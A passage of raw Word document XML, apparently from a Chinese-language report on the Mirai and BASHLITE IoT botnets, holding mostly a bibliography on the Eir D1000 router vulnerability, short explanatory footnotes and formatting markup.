                      <w:t>Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 28 11 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Kenzo, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Eir</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>’</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>s D1000 Modem Is Wide Open To Being Hacked,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 7 11 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[17] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">BadCyber, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">New Mirai attack vector </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>–</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> bot exploits a recently discovered router vulnerability,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
              <w:pPr>
                <w:divId w:val="935603005"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w:rsidR="00A6519C" w:rsidRDefault="00A6519C" w:rsidP="009A1AB3">
              <w:pPr>
                <w:ind w:firstLine="422"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00AE2862" w:rsidRDefault="00AE2862">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE2862" w:rsidRDefault="00AE2862">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE2862" w:rsidRPr="00302839" w:rsidRDefault="00AE2862" w:rsidP="00A20197"/>
    <w:sectPr w:rsidR="00AE2862" w:rsidRPr="003028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052C" w:rsidRDefault="0046052C" w:rsidP="00D56683">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0046052C" w:rsidRDefault="0046052C" w:rsidP="00D5668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052C" w:rsidRDefault="0046052C" w:rsidP="00D56683">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0046052C" w:rsidRDefault="0046052C" w:rsidP="00D56683">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="002D2486" w:rsidRPr="00240703" w:rsidRDefault="002D2486">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BASHLITE</w:t>
      </w:r>
      <w:r>
        <w:t>僵尸主机大都也是物联网设备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3AAE">
        <w:t>https://en.wikipedia.org/wiki/BASHLITE</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="002D2486" w:rsidRPr="006969B5" w:rsidRDefault="002D2486">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006969B5">
        <w:t>http://arstechnica.com/security/2016/10/double-dip-internet-of-things-botnet-attack-felt-across-the-internet/</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="3">
    <w:p w:rsidR="002D2486" w:rsidRPr="00D448BD" w:rsidRDefault="002D2486">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D448BD">
        <w:t>https://www.theguardian.com/technology/2016/nov/03/cyberattack-internet-liberia-ddos-hack-botnet</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="4">
    <w:p w:rsidR="002D2486" w:rsidRPr="002B51AB" w:rsidRDefault="002D2486">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Eir为爱尔兰最大的ISP提供商</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="5">
    <w:p w:rsidR="002D2486" w:rsidRPr="002B51AB" w:rsidRDefault="002D2486" w:rsidP="00221B73">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPE（英文全称：Customer-premises equipment）用户驻地设备，位于用户端的网络终端设备，用于与电信运营商对接服务。CPE包括：用户自己的服务器，主机，以及LAN设备（路由器，交换机，防火墙等）以及ISP负责安装的WAN设备（CSU/DSUs，调制解调器）。CPE可以将4G信号转换为Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>信号</w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D2486" w:rsidRDefault="002D2486">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
  </w:footnote>
  <w:footnote w:id="6">
    <w:p w:rsidR="002D2486" w:rsidRDefault="002D2486">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能是用于端口探测</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76F23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AAFC15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D5A62E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7B802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9A2145E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00864F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A51BDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2282E9E"/>
    <w:lvl w:ilvl="0" w:tplc="BD20016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EA0DD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5058D7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3146F80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82AED5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470504"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="802EFF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076832"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="425AD1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2E3553"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C5E93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610A2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4BE36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DBE540F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3192393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DF1014E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F1A7970"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="404B2C7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EDAFC94"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C1A4CED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B17A0F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56CE5F74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="811E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204F27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2D28552"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65BC3132"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0622C1D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A7B4A04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72E2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9E34B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C26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B666A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA22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0D2F4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A3E6AD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A2F2F41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19E84A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C203183"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63FAC5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1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="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CF5"/>
    <w:rsid w:val="00010BA8"/>
    <w:rsid w:val="00013F59"/>
    <w:rsid w:val="000263D9"/>
    <w:rsid w:val="000351D5"/>
    <w:rsid w:val="00046FD7"/>
    <w:rsid w:val="00067D25"/>
    <w:rsid w:val="0009519D"/>
    <w:rsid w:val="000C123E"/>
    <w:rsid w:val="000C3AAE"/>
    <w:rsid w:val="000E1845"/>
    <w:rsid w:val="000E78DE"/>
    <w:rsid w:val="000E7DAA"/>
    <w:rsid w:val="000F6CCA"/>
    <w:rsid w:val="000F74D9"/>
    <w:rsid w:val="00101332"/>
    <w:rsid w:val="00107DC6"/>
    <w:rsid w:val="00110B80"/>
    <w:rsid w:val="001517ED"/>
    <w:rsid w:val="001727D4"/>
    <w:rsid w:val="00175C9B"/>
    <w:rsid w:val="001914D1"/>
    <w:rsid w:val="00194994"/>
    <w:rsid w:val="00197949"/>
    <w:rsid w:val="001C5E0F"/>
    <w:rsid w:val="001D1455"/>
    <w:rsid w:val="00201D9B"/>
    <w:rsid w:val="00205A54"/>
    <w:rsid w:val="00221B73"/>
    <w:rsid w:val="0022355A"/>
    <w:rsid w:val="002373BC"/>
    <w:rsid w:val="00237AE8"/>
    <w:rsid w:val="00240703"/>
    <w:rsid w:val="00241A62"/>
    <w:rsid w:val="00247D45"/>
    <w:rsid w:val="00247FA1"/>
    <w:rsid w:val="00257FC9"/>
    <w:rsid w:val="00262A6F"/>
    <w:rsid w:val="00270DBE"/>
    <w:rsid w:val="00272683"/>
    <w:rsid w:val="002858A4"/>
    <w:rsid w:val="002962F3"/>
    <w:rsid w:val="002974EC"/>
    <w:rsid w:val="002B33E7"/>
    <w:rsid w:val="002B51AB"/>
    <w:rsid w:val="002D2486"/>
    <w:rsid w:val="002D6D7F"/>
    <w:rsid w:val="002E2D9C"/>
    <w:rsid w:val="002E5A41"/>
    <w:rsid w:val="00301030"/>
    <w:rsid w:val="0030183F"/>
    <w:rsid w:val="00302839"/>
    <w:rsid w:val="00304D7E"/>
    <w:rsid w:val="00313101"/>
    <w:rsid w:val="00323EBB"/>
    <w:rsid w:val="003247FF"/>
    <w:rsid w:val="00324BC2"/>
    <w:rsid w:val="00352BFE"/>
    <w:rsid w:val="003556FB"/>
    <w:rsid w:val="0035585C"/>
    <w:rsid w:val="003714FD"/>
    <w:rsid w:val="00374C28"/>
    <w:rsid w:val="00386B93"/>
    <w:rsid w:val="00391F19"/>
    <w:rsid w:val="00394F8B"/>
    <w:rsid w:val="00397B0D"/>
    <w:rsid w:val="003C3F7B"/>
    <w:rsid w:val="003C6ECE"/>
    <w:rsid w:val="003D31B3"/>
    <w:rsid w:val="003D378D"/>
    <w:rsid w:val="003E254D"/>
    <w:rsid w:val="003E2788"/>
    <w:rsid w:val="003E6248"/>
    <w:rsid w:val="004075FC"/>
    <w:rsid w:val="00422134"/>
    <w:rsid w:val="00434AA9"/>
    <w:rsid w:val="004353F8"/>
    <w:rsid w:val="00450BA2"/>
    <w:rsid w:val="00452B08"/>
    <w:rsid w:val="00453D35"/>
    <w:rsid w:val="00454E3E"/>
    <w:rsid w:val="004554EC"/>
    <w:rsid w:val="0046052C"/>
    <w:rsid w:val="00460ADC"/>
    <w:rsid w:val="00466B3F"/>
    <w:rsid w:val="00490F21"/>
    <w:rsid w:val="004A7883"/>
    <w:rsid w:val="004B0365"/>
    <w:rsid w:val="004B0670"/>
    <w:rsid w:val="004B65F2"/>
    <w:rsid w:val="004C0A4C"/>
    <w:rsid w:val="004C0B7D"/>
    <w:rsid w:val="004C6752"/>
    <w:rsid w:val="004D30AE"/>
    <w:rsid w:val="004F5BB9"/>
    <w:rsid w:val="004F5E64"/>
    <w:rsid w:val="004F757C"/>
    <w:rsid w:val="00511A58"/>
    <w:rsid w:val="00521E90"/>
    <w:rsid w:val="00534C50"/>
    <w:rsid w:val="005363C5"/>
    <w:rsid w:val="00550128"/>
    <w:rsid w:val="00580485"/>
    <w:rsid w:val="00583BC0"/>
    <w:rsid w:val="005B054D"/>
    <w:rsid w:val="005B6355"/>
    <w:rsid w:val="005E3C78"/>
    <w:rsid w:val="005E419F"/>
    <w:rsid w:val="00603332"/>
    <w:rsid w:val="0061327F"/>
    <w:rsid w:val="00613DA3"/>
    <w:rsid w:val="0061449F"/>
    <w:rsid w:val="006322BE"/>
    <w:rsid w:val="00644ED8"/>
    <w:rsid w:val="00650281"/>
    <w:rsid w:val="00652245"/>
    <w:rsid w:val="0065721D"/>
    <w:rsid w:val="00665BFD"/>
    <w:rsid w:val="00667012"/>
    <w:rsid w:val="006828DC"/>
    <w:rsid w:val="006969B5"/>
    <w:rsid w:val="00697F42"/>
    <w:rsid w:val="006B7062"/>
    <w:rsid w:val="006C1B45"/>
    <w:rsid w:val="006C78BA"/>
    <w:rsid w:val="006D0D5D"/>
    <w:rsid w:val="006D30A9"/>
    <w:rsid w:val="006E764F"/>
    <w:rsid w:val="006F02EB"/>
    <w:rsid w:val="00706BCD"/>
    <w:rsid w:val="0070776C"/>
    <w:rsid w:val="00733050"/>
    <w:rsid w:val="007409B1"/>
    <w:rsid w:val="0075321E"/>
    <w:rsid w:val="00757648"/>
    <w:rsid w:val="00766DAE"/>
    <w:rsid w:val="007A27A4"/>
    <w:rsid w:val="007A5235"/>
    <w:rsid w:val="007A7702"/>
    <w:rsid w:val="007B1DCB"/>
    <w:rsid w:val="007B71DE"/>
    <w:rsid w:val="007B7ED4"/>
    <w:rsid w:val="007C0506"/>
    <w:rsid w:val="007C2A53"/>
    <w:rsid w:val="007C7071"/>
    <w:rsid w:val="007E2F86"/>
    <w:rsid w:val="007E77BB"/>
    <w:rsid w:val="007E7DFB"/>
    <w:rsid w:val="007F2118"/>
    <w:rsid w:val="00827A50"/>
    <w:rsid w:val="00827E22"/>
    <w:rsid w:val="0084304B"/>
    <w:rsid w:val="0084698A"/>
    <w:rsid w:val="008539AC"/>
    <w:rsid w:val="008575B1"/>
    <w:rsid w:val="008631C3"/>
    <w:rsid w:val="008637CC"/>
    <w:rsid w:val="00863892"/>
    <w:rsid w:val="00863B70"/>
    <w:rsid w:val="00875B9D"/>
    <w:rsid w:val="008C1061"/>
    <w:rsid w:val="008E4800"/>
    <w:rsid w:val="008F44CC"/>
    <w:rsid w:val="00900F11"/>
    <w:rsid w:val="009235AA"/>
    <w:rsid w:val="009370D9"/>
    <w:rsid w:val="00940F5D"/>
    <w:rsid w:val="009552CA"/>
    <w:rsid w:val="00957F21"/>
    <w:rsid w:val="009A1AB3"/>
    <w:rsid w:val="009D7B07"/>
    <w:rsid w:val="00A20197"/>
    <w:rsid w:val="00A22C57"/>
    <w:rsid w:val="00A23140"/>
    <w:rsid w:val="00A356F2"/>
    <w:rsid w:val="00A63325"/>
    <w:rsid w:val="00A6519C"/>
    <w:rsid w:val="00A7059C"/>
    <w:rsid w:val="00A7472F"/>
    <w:rsid w:val="00A74D85"/>
    <w:rsid w:val="00A831DB"/>
    <w:rsid w:val="00A9362E"/>
    <w:rsid w:val="00A9371E"/>
    <w:rsid w:val="00AA0FE9"/>
    <w:rsid w:val="00AB2484"/>
    <w:rsid w:val="00AB6FD6"/>
    <w:rsid w:val="00AC028D"/>
    <w:rsid w:val="00AC4DDD"/>
    <w:rsid w:val="00AE2862"/>
    <w:rsid w:val="00AE7B06"/>
    <w:rsid w:val="00B01A51"/>
    <w:rsid w:val="00B32FDA"/>
    <w:rsid w:val="00B34068"/>
    <w:rsid w:val="00B40B90"/>
    <w:rsid w:val="00B437C0"/>
    <w:rsid w:val="00B63CF5"/>
    <w:rsid w:val="00B65ABC"/>
    <w:rsid w:val="00B71D8D"/>
    <w:rsid w:val="00B85BAB"/>
    <w:rsid w:val="00B90D0F"/>
    <w:rsid w:val="00B959E0"/>
    <w:rsid w:val="00BA5558"/>
    <w:rsid w:val="00BB30C8"/>
    <w:rsid w:val="00BE7FAF"/>
    <w:rsid w:val="00C2519C"/>
    <w:rsid w:val="00C311BE"/>
    <w:rsid w:val="00C34ADB"/>
    <w:rsid w:val="00C4469A"/>
    <w:rsid w:val="00C60072"/>
    <w:rsid w:val="00C6017E"/>
    <w:rsid w:val="00C70BC2"/>
    <w:rsid w:val="00C74294"/>
    <w:rsid w:val="00C75900"/>
    <w:rsid w:val="00C8532F"/>
    <w:rsid w:val="00C86368"/>
    <w:rsid w:val="00C87FA2"/>
    <w:rsid w:val="00CB04DD"/>
    <w:rsid w:val="00CB7010"/>
    <w:rsid w:val="00CB7D8E"/>
    <w:rsid w:val="00CD376A"/>
    <w:rsid w:val="00CE14A0"/>
    <w:rsid w:val="00CE2DE9"/>
    <w:rsid w:val="00CE5D01"/>
    <w:rsid w:val="00CE6432"/>
    <w:rsid w:val="00CF21F5"/>
    <w:rsid w:val="00CF5378"/>
    <w:rsid w:val="00D019B4"/>
    <w:rsid w:val="00D32442"/>
    <w:rsid w:val="00D35AF1"/>
    <w:rsid w:val="00D448BD"/>
    <w:rsid w:val="00D45C48"/>
    <w:rsid w:val="00D47DF8"/>
    <w:rsid w:val="00D55B37"/>
    <w:rsid w:val="00D56683"/>
    <w:rsid w:val="00D56D66"/>
    <w:rsid w:val="00D77335"/>
    <w:rsid w:val="00D94A81"/>
    <w:rsid w:val="00DA0103"/>
    <w:rsid w:val="00DB35D1"/>
    <w:rsid w:val="00DD4292"/>
    <w:rsid w:val="00DD596D"/>
    <w:rsid w:val="00DE7744"/>
    <w:rsid w:val="00E25A46"/>
    <w:rsid w:val="00E25DC8"/>
    <w:rsid w:val="00E267E0"/>
    <w:rsid w:val="00E37AD2"/>
    <w:rsid w:val="00E520E0"/>
    <w:rsid w:val="00E61CEE"/>
    <w:rsid w:val="00E70CAA"/>
    <w:rsid w:val="00E755C9"/>
    <w:rsid w:val="00E80D5D"/>
    <w:rsid w:val="00E84760"/>
    <w:rsid w:val="00EA1315"/>
    <w:rsid w:val="00EC03BC"/>
    <w:rsid w:val="00EC52D8"/>
    <w:rsid w:val="00ED480A"/>
    <w:rsid w:val="00ED6F99"/>
    <w:rsid w:val="00F07991"/>
    <w:rsid w:val="00F10E83"/>
    <w:rsid w:val="00F1354A"/>
    <w:rsid w:val="00F20691"/>
    <w:rsid w:val="00F47497"/>
    <w:rsid w:val="00F5141B"/>
    <w:rsid w:val="00F568E1"/>
